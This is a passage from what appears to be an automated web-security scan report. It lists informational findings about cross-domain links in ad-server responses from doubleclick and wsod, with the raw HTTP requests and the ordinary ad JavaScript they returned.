document.write('<A TARGET="_blank" HREF="http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bTg2bTdrZShnaWQkc1hOamdHS0lQRTdwQVJwalRsLndqUU1tTWhkN2FrNW1Gb2dBQk1XQSxzdCQxMzE1MzEzMjg4MzcxODkyLHNpJDQ0NTc1NTEsdiQxLjAsYWlkJGFMZzZGa1BEbUxNLSxjdCQyNSx5YngkVXBnUmlkaE9ZWXZFcmhDZkcuSVhYdyxyJDAscmQkMTZpbmdndWY3KSk/1/*http://global.ard.yahoo.com/SIG=15kie638h/M=999999.999999.999999.999999/D=sports/S=25664825:LREC/_ylt=AuXImj6wykRaku7iPAhaBYQ5nYcB/Y=YAHOO/EXP=1315320488/L=sXNjgGKIPE7pARpjTl.wjQMmMhd7ak5mFogABMWA/B=aLg6FkPDmLM-/J=1315313288456508/K=Y8q4t3xfDwCLgDPxHMEVwQ/A=3672358318799275418/R=0/X=6/*http://ad.doubleclick.net/activity;src%3D3329470%3Bmet%3D1%3Bv%3D1%3Bpid%3D70522556%3Baid%3D245556936%3Bko%3D0%3Bcid%3D43793033%3Brid%3D43810820%3Brv%3D2%3Bcs%3Do%3Beid1%3D635384%3Becn1%3D1%3Betm1%3D0%3B_dc_redir%3Durl%3fhttp://ad.doubleclick.net/click%3Bh%3Dv8/3b7a/7/233/%2a/g%3B245556936%3B0-0%3B0%3B70522556%3B4307-300/250%3B43793033/43810820/2%3B%3B%7Esscs%3D%3fhttps://www.facebook.com/SonsofAnarchy"><IMG SRC="http://s0.2mdn.net/3329470/PID_1727001_backup.jpg" width="300" height="250" BORDER=0 alt="'+ altImgAltText +'"></A>
...[SNIP]...

15.15. http://ad.doubleclick.net/adj/N4559.300587.YAHOO-INC.COM/B5825212.3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4559.300587.YAHOO-INC.COM/B5825212.3

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /adj/N4559.300587.YAHOO-INC.COM/B5825212.3;sz=300x250;dcopt=rcl;mtfIFPath=nofile;click=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bXZscjNiZShnaWQkY29weF9XS0lQRTdwQVJwalRsLndqUUo4TWhkN2FrNW1GZEVBQ0xfeixzdCQxMzE1MzEzMTA1Njg2MTQ1LHNpJDQ0NTc1NTEsdiQxLjAsYWlkJExXXzZZa1BEbUxBLSxjdCQyNSx5YngkaEpadGh3bG42Nzlna3FRMnIwNW02USxyJDAscmQkMTZpbzBjdnU2KSk/1/*http://global.ard.yahoo.com/SIG=15kvd6qso/M=999999.999999.999999.999999/D=sports/S=25664825:LREC/_ylt=AuXImj6wykRaku7iPAhaBYQ5nYcB/Y=YAHOO/EXP=1315320305/L=copx_WKIPE7pARpjTl.wjQJ8Mhd7ak5mFdEACL_z/B=LW_6YkPDmLA-/J=1315313105704016/K=r8awXcUkJHjbbi3QZybcoQ/A=3672358318799275418/R=0/X=6/*;ord=1315313105.704016? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 39289
Date: Tue, 06 Sep 2011 12:45:07 GMT

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
</scr' + 'ipt>');
}
else {
var altImgAltText = "";
document.write('<A TARGET="_blank" HREF="http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bXZscjNiZShnaWQkY29weF9XS0lQRTdwQVJwalRsLndqUUo4TWhkN2FrNW1GZEVBQ0xfeixzdCQxMzE1MzEzMTA1Njg2MTQ1LHNpJDQ0NTc1NTEsdiQxLjAsYWlkJExXXzZZa1BEbUxBLSxjdCQyNSx5YngkaEpadGh3bG42Nzlna3FRMnIwNW02USxyJDAscmQkMTZpbzBjdnU2KSk/1/*http://global.ard.yahoo.com/SIG=15kvd6qso/M=999999.999999.999999.999999/D=sports/S=25664825:LREC/_ylt=AuXImj6wykRaku7iPAhaBYQ5nYcB/Y=YAHOO/EXP=1315320305/L=copx_WKIPE7pARpjTl.wjQJ8Mhd7ak5mFdEACL_z/B=LW_6YkPDmLA-/J=1315313105704016/K=r8awXcUkJHjbbi3QZybcoQ/A=3672358318799275418/R=0/X=6/*http://ad.doubleclick.net/activity;src%3D3329470%3Bmet%3D1%3Bv%3D1%3Bpid%3D70522556%3Baid%3D245556936%3Bko%3D0%3Bcid%3D43793033%3Brid%3D43810820%3Brv%3D2%3Bcs%3Do%3Beid1%3D635384%3Becn1%3D1%3Betm1%3D0%3B_dc_redir%3Durl%3fhttp://ad.doubleclick.net/click%3Bh%3Dv8/3b7a/7/233/%2a/g%3B245556936%3B0-0%3B0%3B70522556%3B4307-300/250%3B43793033/43810820/2%3B%3B%7Esscs%3D%3fhttps://www.facebook.com/SonsofAnarchy"><IMG SRC="http://s0.2mdn.net/3329470/PID_1727001_backup.jpg" width="300" height="250" BORDER=0 alt="'+ altImgAltText +'"></A>
...[SNIP]...

15.16. http://ad.doubleclick.net/adj/N6092.yahoo.com/B5098223.114

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6092.yahoo.com/B5098223.114

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /adj/N6092.yahoo.com/B5098223.114;sz=300x250;dcopt=rcl;click=http://global.ard.yahoo.com/SIG=15p51oj0b/M=791180.14774018.14532197.7298264/D=music/S=791003591:LREC/Y=YAHOO/EXP=1315320573/L=3XUjIESO22TpARpjTl.wjQJWMhd7ak5mFtwADkWh/B=tTtUlEJe5mQ-/J=1315313373000253/K=cQx9gpXXfcj98RtyFfj6vQ/A=6474079/R=0/*;ord=0.6283681544009596? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://new.music.yahoo.com/blogs/live/13348/red-hot-chili-peppers-exclusive-interview-new-album-new-member-new-video/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 54705
Date: Tue, 06 Sep 2011 12:49:36 GMT

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
</scr' + 'ipt>');
}
}
else {
document.write('<A TARGET="_blank" HREF="http://global.ard.yahoo.com/SIG=15p51oj0b/M=791180.14774018.14532197.7298264/D=music/S=791003591:LREC/Y=YAHOO/EXP=1315320573/L=3XUjIESO22TpARpjTl.wjQJWMhd7ak5mFtwADkWh/B=tTtUlEJe5mQ-/J=1315313373000253/K=cQx9gpXXfcj98RtyFfj6vQ/A=6474079/R=0/*http://ad.doubleclick.net/activity;src%3D2587596%3Bmet%3D1%3Bv%3D1%3Bpid%3D66874147%3Baid%3D245308072%3Bko%3D0%3Bcid%3D43561363%3Brid%3D43579150%3Brv%3D1%3Bcs%3Dl%3Beid1%3D555469%3Becn1%3D1%3Betm1%3D0%3B_dc_redir%3Durl%3fhttp://ad.doubleclick.net/click%3Bh%3Dv8/3b7a/7/f2/%2a/k%3B245308072%3B0-0%3B0%3B66874147%3B4307-300/250%3B43561363/43579150/1%3B%3B%7Esscs%3D%3fhttp://www.ramtrucks.com/hostc/bmo/models.do?modelYearCode=CUT201113&zipCode=&sid=888357&pid=66874147&adid=245308072&channel=display"><IMG id="IMG_'+ variableName +'" SRC="http://s0.2mdn.net/2587596/PID_1706756_Country_300x250_ExpandEndFrame.jpg" width="300" height="250" BORDER=0 alt= "'+ altImgAltText +'"/></A>
...[SNIP]...

15.17. http://ad.doubleclick.net/adj/ober.frontier/product_119282623

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/ober.frontier/product_119282623

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /adj/ober.frontier/product_119282623;sz=300x160;ord=278143426403403.28? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://games.frontier.com/game.htm?code=119282623&lc=en&channel=110464377
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 376
Date: Tue, 06 Sep 2011 12:50:49 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b7a/0/0/%2a/j;220083469;0-0;0;70766983;5467-300/160;34511822/34529700/1;;~okv=;sz=300x160;~sscs=%3fhttp://games.frontier.com/game.htm?code=117718267&RefId=FR300x160"><img src="http://s0.2mdn.net/viewad/2566764/300x160_treasure_of_serengeti.jpg" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

15.18. http://ad.doubleclick.net/adj/ober.frontier/product_undefined

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/ober.frontier/product_undefined

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /adj/ober.frontier/product_undefined;sz=300x160;ord=8383746361359954? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://games.frontier.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 376
Date: Tue, 06 Sep 2011 12:45:30 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b7a/0/0/%2a/g;220083469;0-0;0;43698690;5467-300/160;34511822/34529700/1;;~okv=;sz=300x160;~sscs=%3fhttp://games.frontier.com/game.htm?code=117718267&RefId=FR300x160"><img src="http://s0.2mdn.net/viewad/2566764/300x160_treasure_of_serengeti.jpg" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

15.19. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/104.0.iframe.300x250/1315313295.31599

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/457d7d7cd3cd82d66ba00fc48f756260/104.0.iframe.300x250/1315313295.31599

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /embed/457d7d7cd3cd82d66ba00fc48f756260/104.0.iframe.300x250/1315313295.31599?click=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bXRzM3ViNChnaWQkMnRvdkUwUERrampwQVJwalRsLndqUU9jTWhkN2FrNW1GbzRBRG5wUixzdCQxMzE1MzEzMjk0OTk3MjE0LHNpJDQ0NTEwNTEsdiQxLjAsYWlkJHdPdGtKMFBEbU9nLSxjdCQyNSx5YngkcG1naGl6R3VZYkg4WWxZa2VkWDdEUSxyJDAscmQkMTZpY3AwNHFzKSk/1/*http://global.ard.yahoo.com/SIG=15h8n21ld/M=999999.999999.999999.999999/D=fin/S=95993639:LREC/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=wOtkJ0PDmOg-/J=1315313295031599/K=kYjDTKuicqWfKJal7_1uqQ/A=3861873750735285092/R=0/X=6/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/q;_ylt=AsjqkoVImXcgcrWAEaC7OLbxVax_;_ylu=X3oDMTFhZzdpNWRjBHBvcwMxMgRzZWMDeWZpU3ltYm9sTG9va3VwUmVzdWx0cwRzbGsDeHNzZg--?s=XSS.F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_1=46:1542:790:131:0:55175:1315313288:L|46:675:22:0:0:55175:1315313098:L|40:409:178:0:0:50961:1315262572:B2; i_34=2:68:117:4:0:55175:1315313288:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 06 Sep 2011 12:48:17 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2995

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
<NOSCRIPT><a href="http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bXRzM3ViNChnaWQkMnRvdkUwUERrampwQVJwalRsLndqUU9jTWhkN2FrNW1GbzRBRG5wUixzdCQxMzE1MzEzMjk0OTk3MjE0LHNpJDQ0NTEwNTEsdiQxLjAsYWlkJHdPdGtKMFBEbU9nLSxjdCQyNSx5YngkcG1naGl6R3VZYkg4WWxZa2VkWDdEUSxyJDAscmQkMTZpY3AwNHFzKSk/1/*http://global.ard.yahoo.com/SIG=15h8n21ld/M=999999.999999.999999.999999/D=fin/S=95993639:LREC/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=wOtkJ0PDmOg-/J=1315313295031599/K=kYjDTKuicqWfKJal7_1uqQ/A=3861873750735285092/R=0/X=6/*http://ad.wsod.com/click/457d7d7cd3cd82d66ba00fc48f756260/104.0.iframe.300x250/" target="_blank" border="0" style="border:0px;"><img border="0" style="border:0px;" src="//ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/104.0.img.300x250/1315313297**;" />
...[SNIP]...

15.20. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/104.0.iframe.300x250/1315313297**

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/457d7d7cd3cd82d66ba00fc48f756260/104.0.iframe.300x250/1315313297**

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /embed/457d7d7cd3cd82d66ba00fc48f756260/104.0.iframe.300x250/1315313297**;10,3,183;1920;1200;http%3A_@2F_@2Ffinance.yahoo.com_@2Fq%3B_ylt%3DAsjqkoVImXcgcrWAEaC7OLbxVax_%3B_ylu%3DX3oDMTFhZzdpNWRjBHBvcwMxMgRzZWMDeWZpU3ltYm9sTG9va3VwUmVzdWx0cwRzbGsDeHNzZg--_@3Fs%3DXSS.F?click=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bXRzM3ViNChnaWQkMnRvdkUwUERrampwQVJwalRsLndqUU9jTWhkN2FrNW1GbzRBRG5wUixzdCQxMzE1MzEzMjk0OTk3MjE0LHNpJDQ0NTEwNTEsdiQxLjAsYWlkJHdPdGtKMFBEbU9nLSxjdCQyNSx5YngkcG1naGl6R3VZYkg4WWxZa2VkWDdEUSxyJDAscmQkMTZpY3AwNHFzKSk/1/*http://global.ard.yahoo.com/SIG=15h8n21ld/M=999999.999999.999999.999999/D=fin/S=95993639:LREC/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=wOtkJ0PDmOg-/J=1315313295031599/K=kYjDTKuicqWfKJal7_1uqQ/A=3861873750735285092/R=0/X=6/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/104.0.iframe.300x250/1315313295.31599?click=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bXRzM3ViNChnaWQkMnRvdkUwUERrampwQVJwalRsLndqUU9jTWhkN2FrNW1GbzRBRG5wUixzdCQxMzE1MzEzMjk0OTk3MjE0LHNpJDQ0NTEwNTEsdiQxLjAsYWlkJHdPdGtKMFBEbU9nLSxjdCQyNSx5YngkcG1naGl6R3VZYkg4WWxZa2VkWDdEUSxyJDAscmQkMTZpY3AwNHFzKSk/1/*http://global.ard.yahoo.com/SIG=15h8n21ld/M=999999.999999.999999.999999/D=fin/S=95993639:LREC/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=wOtkJ0PDmOg-/J=1315313295031599/K=kYjDTKuicqWfKJal7_1uqQ/A=3861873750735285092/R=0/X=6/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_1=46:1542:790:131:0:55175:1315313288:L|46:675:22:0:0:55175:1315313098:L|40:409:178:0:0:50961:1315262572:B2; i_34=2:68:117:4:0:55175:1315313288:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 06 Sep 2011 12:48:18 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_34=2:104:25:6:0:55175:1315313298:L|2:68:117:4:0:55175:1315313288:L; expires=Fri, 07-Oct-2011 12:48:18 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1471

   function wsod_image104() {
       document.write('<a href="http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bXRzM3ViNChnaWQkMnRvdkUwUERrampwQVJwalRsLndqUU9jTWhkN2FrNW1GbzRBRG5wUixzdCQxMzE1MzEzMjk0OTk3MjE0LHNpJDQ0NTEwNTEsdiQxLjAsYWlkJHdPdGtKMFBEbU9nLSxjdCQyNSx5YngkcG1naGl6R3VZYkg4WWxZa2VkWDdEUSxyJDAscmQkMTZpY3AwNHFzKSk/1/*http://global.ard.yahoo.com/SIG=15h8n21ld/M=999999.999999.999999.999999/D=fin/S=95993639:LREC/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=wOtkJ0PDmOg-/J=1315313295031599/K=kYjDTKuicqWfKJal7_1uqQ/A=3861873750735285092/R=0/X=6/*http://ad.doubleclick.net/click;h=v2|3E32|0|0|%2a|y;233976268;0-0;0;68150994;31-1|1;39902691|39920478|1;;;pc=WSOD%3fhttp://ad.wsod.com/click/457d7d7cd3cd82d66ba00fc48f756260/104.25.iframe.300x250/**;10.3183;1920;1200;http:_@2F_@2Ffinance.yahoo.com_@2Fq;_ylt=AsjqkoVImXcgcrWAEaC7OLbxVax_;_ylu=X3oDMTFhZzdpNWRjBHBvcwMxMgRzZWMDeWZpU3ltYm9sTG9va3VwUmVzdWx0cwRzbGsDeHNzZg--_@3Fs=XSS.F" target="_blank" title="Click to find out more!"><img style="border:none;" src="http://ad.wsodcdn.com/457d7d7cd3cd82d66ba00fc48f756260/PET_TMarketOppsStatic_300x250_100110.gif" alt="Click to find out more!" /></a>
...[SNIP]...

15.21. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313286070877

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313286070877

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313286070877?yud=smpv%3d3%26ed%3dKfb2BHkzcaa_Ez5Am4dvC37N1raRCR5h1JWlV.d5tpky0b8xMSZkytDAsrQiWlFiRI7KrmsgZd3dnvnG&encver=1&encalgo=3DES-CFB-SHA1&app=apt&intf=1&click=http://global.ard.yahoo.com/SIG=15ulf41ae/M=601843023.602979803.858295551.826566051/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs/B=oNrGPtGDJHI-/J=1315313286070877/K=URqeTfr3zDD1947mBh5eOA/A=3686351322249551559/R=0/X=3/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/lookup?s=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_1=46:675:22:0:0:55175:1315313098:L|40:409:178:0:0:50961:1315262572:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 06 Sep 2011 12:48:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2564

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
<NOSCRIPT><a href="http://global.ard.yahoo.com/SIG=15ulf41ae/M=601843023.602979803.858295551.826566051/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs/B=oNrGPtGDJHI-/J=1315313286070877/K=URqeTfr3zDD1947mBh5eOA/A=3686351322249551559/R=0/X=3/*http://ad.wsod.com/click/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/" target="_blank" border="0" style="border:0px;"><img border="0" style="border:0px;" src="//ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.img.120x60/1315313288**;" />
...[SNIP]...

15.22. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313288**

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313288**

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313288**;10,3,183;1920;1200;http%3A_@2F_@2Ffinance.yahoo.com_@2Flookup_@3Fs%3Dxss?yud=smpv%3d3%26ed%3dKfb2BHkzcaa_Ez5Am4dvC37N1raRCR5h1JWlV.d5tpky0b8xMSZkytDAsrQiWlFiRI7KrmsgZd3dnvnG&click=http://global.ard.yahoo.com/SIG=15ulf41ae/M=601843023.602979803.858295551.826566051/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs/B=oNrGPtGDJHI-/J=1315313286070877/K=URqeTfr3zDD1947mBh5eOA/A=3686351322249551559/R=0/X=3/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313286070877?yud=smpv%3d3%26ed%3dKfb2BHkzcaa_Ez5Am4dvC37N1raRCR5h1JWlV.d5tpky0b8xMSZkytDAsrQiWlFiRI7KrmsgZd3dnvnG&encver=1&encalgo=3DES-CFB-SHA1&app=apt&intf=1&click=http://global.ard.yahoo.com/SIG=15ulf41ae/M=601843023.602979803.858295551.826566051/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs/B=oNrGPtGDJHI-/J=1315313286070877/K=URqeTfr3zDD1947mBh5eOA/A=3686351322249551559/R=0/X=3/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT; i_1=46:675:22:0:0:55175:1315313098:L|40:409:178:0:0:50961:1315262572:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 06 Sep 2011 12:48:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_34=2:68:117:4:0:55175:1315313288:L; expires=Fri, 07-Oct-2011 12:48:08 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1182

   function wsod_image68() {
       document.write('<a href="http://global.ard.yahoo.com/SIG=15ulf41ae/M=601843023.602979803.858295551.826566051/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs/B=oNrGPtGDJHI-/J=1315313286070877/K=URqeTfr3zDD1947mBh5eOA/A=3686351322249551559/R=0/X=3/*http://ad.doubleclick.net/click;h=v2|3D5D|0|0|%2a|t;234260563;0-0;0;58130593;31-1|1;39902686|39920473|1;;;pc=WSOD%3fhttp://ad.wsod.com/click/457d7d7cd3cd82d66ba00fc48f756260/68.117.iframe.120x60/yud*smpv=3|ed=Kfb2BHkzcaa_Ez5Am4dvC37N1raRCR5h1JWlV.d5tpky0b8xMSZkytDAsrQiWlFiRI7KrmsgZd3dnvnG**;10.3183;1920;1200;http:_@2F_@2Ffinance.yahoo.com_@2Flookup_@3Fs=xss" target="_blank" title="Click to find out more!"><img style="border:none;" src="http://ad.wsodcdn.com/457d7d7cd3cd82d66ba00fc48f756260/TR_LogoTextPO_No_120x60_Why_12.1.gif" alt="Click to find out more!" /></a>
...[SNIP]...

15.23. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313295039208

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313295039208

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313295039208?yud=smpv%3d3%26ed%3dKfb2BHkzcaa_Ez5Am4dvC37N1raRCR5h1JWlV.d5tpky0b8xMSZkytDAsrQiWlFiRI7KrmsgZd3dnvnG&encver=1&encalgo=3DES-CFB-SHA1&app=apt&intf=1&click=http://global.ard.yahoo.com/SIG=15sm6vod4/M=601843023.602979803.858295551.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=sWXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=3686351322249551559/R=0/X=3/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/q;_ylt=AsjqkoVImXcgcrWAEaC7OLbxVax_;_ylu=X3oDMTFhZzdpNWRjBHBvcwMxMgRzZWMDeWZpU3ltYm9sTG9va3VwUmVzdWx0cwRzbGsDeHNzZg--?s=XSS.F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
